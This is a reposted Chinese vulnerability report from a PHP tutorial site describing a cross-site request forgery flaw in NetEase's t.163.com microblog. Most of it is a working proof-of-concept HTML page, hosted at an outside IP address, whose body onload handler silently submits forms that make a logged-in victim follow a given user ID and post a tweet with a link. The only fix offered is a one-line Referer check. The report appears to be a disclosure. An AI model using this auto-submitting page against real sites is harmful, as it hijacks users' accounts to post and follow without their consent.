来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 1、登陆http://t.163.com2、访问http://50.19.159.231/163.html3、回到微博首页,自动发微博加关注漏洞证明:htmlheadtitle163 weibo csrf test/titlescript type=text/javascript//follow mef......
1、登陆http://t.163.com
2、访问http://50.19.159.231/163.html 3、回到微博首页,自动发微博加关注 漏洞证明: <html> <head> <title>163 weibo csrf test</title> <script type="text/javascript"> //follow me function addF(){ document.getElementById("addF").submit(); } //add twitter function addT(){ document.getElementById("addT").submit(); } </script> </head> <body onload="addF();addT();"> <form target="addFF" id="addF" method="POST" action="http://t.163.com/relation.do?method=follow"> <input type="text" name="userId" value="-648356100822396112"> <input type="submit" value="go"> </form> <form target="addTF" id="addT" method="POST" action="http://t.163.com/tweet.do?method=addTweet"> <input type="text" name="content" value="http://163.fm/ www.2cto.com "> <input type="submit" value="go"> </form> <iframe name="addFF"></iframe> <iframe name="addTF"></iframe> </body> </html> 修复方案: 检查referer 作者 PiaCa |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com